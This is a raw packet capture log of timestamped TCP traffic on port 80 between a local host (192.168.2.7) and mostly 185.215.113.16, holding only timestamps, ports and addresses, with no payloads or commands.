Dec 7, 2024 13:00:02.519926071 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.519972086 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.520064116 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.520134926 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.520936012 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.521002054 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.521138906 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.521181107 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.521994114 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.522041082 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.522155046 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.522196054 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.523010015 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.523050070 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.523247957 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.523291111 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.524187088 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.524230003 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.524375916 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.524419069 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.525180101 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.525223970 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.525379896 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.525418997 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.526360989 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.526422977 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.526503086 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.526542902 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.527257919 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.527301073 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.527421951 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.527465105 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.528254986 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.528295994 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.528443098 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.528486967 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.529299021 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.529340029 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.666398048 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.666479111 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.666568995 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.666631937 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.666954994 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.667005062 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.667365074 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.667411089 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.668387890 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.668436050 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.668718100 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.668762922 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.668826103 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.668865919 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.669579983 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.669637918 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.669708014 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.669747114 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.670406103 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.670447111 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.670607090 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.670641899 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.671464920 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.671510935 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.671658993 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.671715021 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.672513962 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.672554970 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.672728062 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.672764063 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.673573017 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.673614979 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.673763990 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.673809052 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.674597025 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.674635887 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.674851894 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.674895048 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.675669909 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.675708055 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.675822020 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.675863028 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.676733017 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.676780939 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.676867008 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.676908016 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.677726030 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.677769899 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.677917957 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.677961111 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.678800106 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.678844929 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.678965092 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.679007053 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.679873943 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.679934978 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.680062056 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.680102110 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.680883884 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.680927038 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.681052923 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.681094885 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.681896925 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.681940079 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.682107925 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.682149887 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.682976961 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.683015108 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.683165073 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.683203936 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.684146881 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.684190035 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.684402943 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.684443951 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.685102940 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.685146093 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.685302973 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.685343981 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.686127901 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.686170101 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.686300039 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.686340094 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.687135935 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.687180042 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.687414885 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.687457085 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.688206911 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.688261032 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.688484907 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.688540936 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.689263105 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.689311981 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.689505100 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.689553976 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.690316916 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.690388918 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.690473080 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.690520048 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.691550016 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.691605091 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.691719055 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.691767931 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.692414045 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.692465067 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.692603111 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.692651033 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.693510056 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.693588018 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.693670988 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.693718910 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.694551945 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.694616079 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.694693089 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.694742918 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.695588112 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.695646048 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.695743084 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.695794106 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.696688890 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.696733952 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.696801901 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.696841955 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.697730064 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.697794914 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.697943926 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.697983980 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.698736906 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.698776960 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.698888063 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.698930025 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.699764013 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.699812889 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.700021982 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.700061083 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.700829983 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.700886011 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.701001883 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.701039076 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.701850891 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.701891899 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.702084064 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.702126026 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.702863932 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.702905893 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.703047991 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.703085899 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.703933954 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.703978062 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.704122066 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.704160929 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.704966068 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.705008984 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.705169916 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.705210924 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.705465078 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 13:00:02.705514908 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 13:00:02.706007004 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.706048012 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.706214905 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.706254959 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.707071066 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.707114935 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.707246065 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.707288027 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.708116055 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.708172083 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.708296061 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.708336115 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.709127903 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.709171057 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.709328890 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.709372044 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.710174084 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.710232973 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.710374117 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.710416079 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.711282969 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.711350918 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.711571932 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.711612940 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.712325096 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.712380886 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.712538958 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.712587118 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.713351965 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.713401079 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.713531017 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.713570118 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.714382887 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.714428902 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.714566946 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.714601040 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.715432882 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.715514898 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.715607882 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.715648890 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.716468096 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.716511011 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.716666937 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.716708899 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.717650890 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.717698097 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.717829943 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.717875004 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.718616009 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.718676090 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.718787909 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.718830109 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.719610929 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.719655991 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.719793081 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.719832897 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.720730066 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.720777988 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.720844030 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.720889091 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.858675003 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.858725071 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.858871937 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.858911037 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.859293938 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.859330893 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.859483004 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.859493971 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.859523058 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.860264063 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.860312939 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.860541105 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.860588074 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.861313105 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.861371994 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.861521959 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.861562967 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.862371922 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.862416029 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.862544060 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.862581968 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.863518953 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.863562107 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.863753080 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.863795042 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.864711046 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.864753008 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.864891052 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.864929914 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.865571022 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.865609884 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.865768909 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.865813971 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.866735935 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.866800070 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.866906881 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.866950035 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.867610931 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.867659092 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.867814064 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.867856026 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.868748903 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.868802071 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.868944883 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.869005919 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.869667053 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.869728088 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.869874001 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.869915009 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.870731115 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.870776892 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.870930910 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.870976925 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.871782064 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.871849060 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.871977091 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.872018099 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.872806072 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.872850895 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.873051882 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.873094082 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.873862028 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.873905897 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.874083042 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.874123096 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.874907970 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.874944925 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.875108957 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.875149965 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.875993013 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.876034975 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.876264095 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.876302958 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.877074003 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.877135038 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.877252102 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.877293110 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.878086090 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.878120899 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.878273964 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.878313065 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.879134893 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.879179001 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.879301071 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.879340887 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.880177021 CET	80	49829	185.215.113.16	192.168.2.7
